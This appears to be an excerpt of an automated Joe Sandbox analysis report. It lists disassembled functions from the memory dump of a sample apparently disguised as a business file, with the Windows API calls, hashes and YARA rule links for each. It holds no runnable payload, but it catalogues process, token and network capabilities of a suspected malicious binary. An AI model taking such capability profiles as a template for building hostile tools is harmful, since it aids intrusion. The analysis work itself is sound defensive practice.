                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: 940fb1e0c1b1127b2f57bc0ab2050d04606d8e106e83e69a80f8fc8a57662172
                                                        • Instruction ID: 6c10b2ccdefe7be638430ddac47c7e8737713c8347e65468e897763fff8c38ae
                                                        • Opcode Fuzzy Hash: 940fb1e0c1b1127b2f57bc0ab2050d04606d8e106e83e69a80f8fc8a57662172
                                                        • Instruction Fuzzy Hash: A911D33A200305EBCB259F34EC45EBA77ADFF45350B40802AF906CB2A1EB719880C7D1
                                                        Function 007F50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 007F5101
                                                          • Part of subcall function 007E571C: __FF_MSGBANNER.LIBCMT ref: 007E5733
                                                          • Part of subcall function 007E571C: __NMSG_WRITE.LIBCMT ref: 007E573A
                                                          • Part of subcall function 007E571C: RtlAllocateHeap.NTDLL(00EC0000,00000000,00000001,00000000,?,?,?,007E0DD3,?), ref: 007E575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 79eda78fada05f82cb7a62059cd885d187b302006f9df2678249481aac799773
                                                        • Instruction ID: b2899bc667b8faeb0872792f892f18f81de651257eaf60f96e0a70e9f9348914
                                                        • Opcode Fuzzy Hash: 79eda78fada05f82cb7a62059cd885d187b302006f9df2678249481aac799773
                                                        • Instruction Fuzzy Hash: 2511C6B2502A5DEECB312FB5EC49B7E3798AF09361F200529FB0996352DF3C99409791
                                                        Function 007C44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 007C44CF
                                                          • Part of subcall function 007C407C: _memset.LIBCMT ref: 007C40FC
                                                          • Part of subcall function 007C407C: _wcscpy.LIBCMT ref: 007C4150
                                                          • Part of subcall function 007C407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007C4160
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 007C4524
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007C4533
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007FD4B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: b214ba459b6a459febc060319a4cad8748a5d51031de0c2954df87e0a8cf773e
                                                        • Instruction ID: 06d684577e329428480372168cbf194bf29b7f1bde03e8e235b87b9f8d688807
                                                        • Opcode Fuzzy Hash: b214ba459b6a459febc060319a4cad8748a5d51031de0c2954df87e0a8cf773e
                                                        • Instruction Fuzzy Hash: 5D219574904798AFE7328B249855FF6BBEDAF06314F04009DE79A96242C7786D84CB51
                                                        Function 00836369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00827896,?,?,00000000), ref: 007C5A2C
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00827896,?,?,00000000,?,?), ref: 007C5A50
                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00836399
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008363A4
                                                        • _memmove.LIBCMT ref: 008363D1
                                                        • inet_ntoa.WSOCK32(?), ref: 008363DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: 2ad3c3ff03715bb7232bc355745b380dd65e3ce457e0977d3a3f852a3143b2a5
                                                        • Instruction ID: 0d3d318f0605a9a9363d0855296f1eb07e621542a47cb1d44230b11c346300fd
                                                        • Opcode Fuzzy Hash: 2ad3c3ff03715bb7232bc355745b380dd65e3ce457e0977d3a3f852a3143b2a5
                                                        • Instruction Fuzzy Hash: 94113D75500109EFCB04EBA4D94ADAEBBB8FF49310B14406DF605A7262DB35AE54CBA1
                                                        Function 00818B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00818B61
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00818B73
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00818B89
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00818BA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: ee93f96179a7339646fb8ea82df25039172cd007bd6e8668179f9d98d552fdc2
                                                        • Instruction ID: 518ad5cda79f3355e13307af8eaa53534a03649af2c2ab8368d3b0ffbb05040e
                                                        • Opcode Fuzzy Hash: ee93f96179a7339646fb8ea82df25039172cd007bd6e8668179f9d98d552fdc2
                                                        • Instruction Fuzzy Hash: ED110679901218FFEB11DBA5C885EADBBB8FF48710F2040A5EA04B7290DA716E51DB94
                                                        Function 007C1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 007C12D8
                                                        • GetClientRect.USER32(?,?), ref: 007FB5FB
                                                        • GetCursorPos.USER32(?), ref: 007FB605
                                                        • ScreenToClient.USER32(?,?), ref: 007FB610
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 9890985110b248aa707bea1304d68aab700b0aac595ef255caaed57b3d1dbadd
                                                        • Instruction ID: 79ae6947eee0eb1d08689a5ab891ae9c7cec784a70d22ce11fbc0a2af7c7f814
                                                        • Opcode Fuzzy Hash: 9890985110b248aa707bea1304d68aab700b0aac595ef255caaed57b3d1dbadd
                                                        • Instruction Fuzzy Hash: F111FE39600019EBDB10EF98D889EBE77B8FB06301F50446DFA11E7152D734BA51CBA5
                                                        Function 00821142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0081FCED,?,00820D40,?,00008000), ref: 0082115F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0081FCED,?,00820D40,?,00008000), ref: 00821184
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0081FCED,?,00820D40,?,00008000), ref: 0082118E
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0081FCED,?,00820D40,?,00008000), ref: 008211C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 018666aafec640beebcefb1f5314c96a4d6defb4ff73d7c9a6f8a4ad3c28a5e8
                                                        • Instruction ID: dfed87c0b5fe89596a98162dc7ffdaa22c00b7ba15f3fa259fc52342ccac71e7
                                                        • Opcode Fuzzy Hash: 018666aafec640beebcefb1f5314c96a4d6defb4ff73d7c9a6f8a4ad3c28a5e8
                                                        • Instruction Fuzzy Hash: D9113C35D0052DE7CF009FA5E848AEEBBB8FF29711F114059EA45F2241CB7095A0CB96
                                                        Function 0081D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0081D84D
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0081D864
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0081D879
                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0081D897
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                        • String ID:
                                                        • API String ID: 1352324309-0
                                                        • Opcode ID: 7c8188028f5e40803d0fa955ddb98dc2d430faf730fd90d8eae83bf1c61d0723
                                                        • Instruction ID: eb904256c1da62f020b1432737bec38f65f188cae2e7b75c814c0de440bbe20b
                                                        • Opcode Fuzzy Hash: 7c8188028f5e40803d0fa955ddb98dc2d430faf730fd90d8eae83bf1c61d0723
                                                        • Instruction Fuzzy Hash: 51113C75605309DBE3208F50DC08FD2BBACFF00B14F10897DAA16D6051D7B0E689DBA1
                                                        Function 007F6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: 735967d579bee21630d392224d2904460b6bace23d80d77b5be34bf3fa86929f
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: A4014B7244814EBBCF1A5E84DC05CEE3F62BF28355B588415FB1899231D63AC9B1EB81
                                                        Function 0084B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 0084B2E4
                                                        • ScreenToClient.USER32(?,?), ref: 0084B2FC
                                                        • ScreenToClient.USER32(?,?), ref: 0084B320
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0084B33B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: 0307c42912ebd50c2516383c7d745a923b71082da08d13c0c7d4dd29afd1fdde
                                                        • Instruction ID: aae22d358cc6815fc7c6778455eb35de810586b0e6f09d18f4154c66db61848c
                                                        • Opcode Fuzzy Hash: 0307c42912ebd50c2516383c7d745a923b71082da08d13c0c7d4dd29afd1fdde
                                                        • Instruction Fuzzy Hash: F41143B9D00209EFDB41CFA9D8849EEBBF9FB19310F108166E914E3220D735AA65CF50
                                                        Function 0084B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0084B644
                                                        • _memset.LIBCMT ref: 0084B653
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00886F20,00886F64), ref: 0084B682
                                                        • CloseHandle.KERNEL32 ref: 0084B694
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3277943733-0
                                                        • Opcode ID: 015f573a7a457ea6f2d5150451cc3e83abdf53f557c01972817b48e7cb3b0298
                                                        • Instruction ID: 64a582779679d7a878d78917004d5bd80d016d188478b49ccdc81a9304817755
                                                        • Opcode Fuzzy Hash: 015f573a7a457ea6f2d5150451cc3e83abdf53f557c01972817b48e7cb3b0298
                                                        • Instruction Fuzzy Hash: E0F0F4B1640304BAE2106B657C09F7B7A9CFB09755F005025BB08E5192EB759C21C7A8
                                                        Function 00826BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00826BE6
                                                          • Part of subcall function 008276C4: _memset.LIBCMT ref: 008276F9
                                                        • _memmove.LIBCMT ref: 00826C09
                                                        • _memset.LIBCMT ref: 00826C16
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00826C26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: 7aed2e60c55b2d598153b5cf7590c8760a26b56d8f52fcd1d814e4712c51ebfa
                                                        • Instruction ID: 8004c66c11dd70318c2f7387bd0cf7ef4ecf0f2abee8ec2d332b4dfaa8d64c18
                                                        • Opcode Fuzzy Hash: 7aed2e60c55b2d598153b5cf7590c8760a26b56d8f52fcd1d814e4712c51ebfa
                                                        • Instruction Fuzzy Hash: 04F0543A201110BBCF016F55EC89A4ABB29FF49321F048065FE089E227C775E851CBB5
                                                        Function 007C2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 007C2231
                                                        • SetTextColor.GDI32(?,000000FF), ref: 007C223B
                                                        • SetBkMode.GDI32(?,00000001), ref: 007C2250
                                                        • GetStockObject.GDI32(00000005), ref: 007C2258
                                                        • GetWindowDC.USER32(?,00000000), ref: 007FBE83
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 007FBE90
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 007FBEA9
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 007FBEC2
                                                        • GetPixel.GDI32(00000000,?,?), ref: 007FBEE2
                                                        • ReleaseDC.USER32(?,00000000), ref: 007FBEED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 490557382251be743504c5446020f2cfc90b39829ab5b5b67357fa188e1f207f
                                                        • Instruction ID: c469214ecbe2ca375a187422f216fc6d9d7ea4bf9d1a59e3b12a868017e102f7
                                                        • Opcode Fuzzy Hash: 490557382251be743504c5446020f2cfc90b39829ab5b5b67357fa188e1f207f
                                                        • Instruction Fuzzy Hash: B2E03936104244EAEB225F64EC0DBE83B10FB06332F01836AFB69980E287B14980DB12
                                                        Function 00818712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 0081871B
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,008182E6), ref: 00818722
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008182E6), ref: 0081872F
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,008182E6), ref: 00818736
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: b99ca69c88b84a930254a3ac9314dd70ac6031e096b63b09312b10a40db68cdb
                                                        • Instruction ID: 483a8eab5a525d947b0e63cf0687d7afc653846a391ef62ff88bb0936e887a3e
                                                        • Opcode Fuzzy Hash: b99ca69c88b84a930254a3ac9314dd70ac6031e096b63b09312b10a40db68cdb
                                                        • Instruction Fuzzy Hash: 15E04F3A6112119BD7205FF15D0DB967BACFF52792F14482CA345C9081DA248481C750
                                                        Function 0081B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0081B4BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3565006973-3941886329
                                                        • Opcode ID: 4beaf2265144891e3028139096f3392aa8958cb5505dd99dee332afd57cc7b55
                                                        • Instruction ID: eff665c653a1300e26d6dbd867033d4b470f300eb4eb2d0747c2c7b1c0c32567
                                                        • Opcode Fuzzy Hash: 4beaf2265144891e3028139096f3392aa8958cb5505dd99dee332afd57cc7b55
                                                        • Instruction Fuzzy Hash: D0913970600605AFDB14DF69C884AAAB7F9FF49710F20856DF94ACB391DB71E885CB50
                                                        Function 0082AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007DFC86: _wcscpy.LIBCMT ref: 007DFCA9
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • __wcsnicmp.LIBCMT ref: 0082B02D
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0082B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
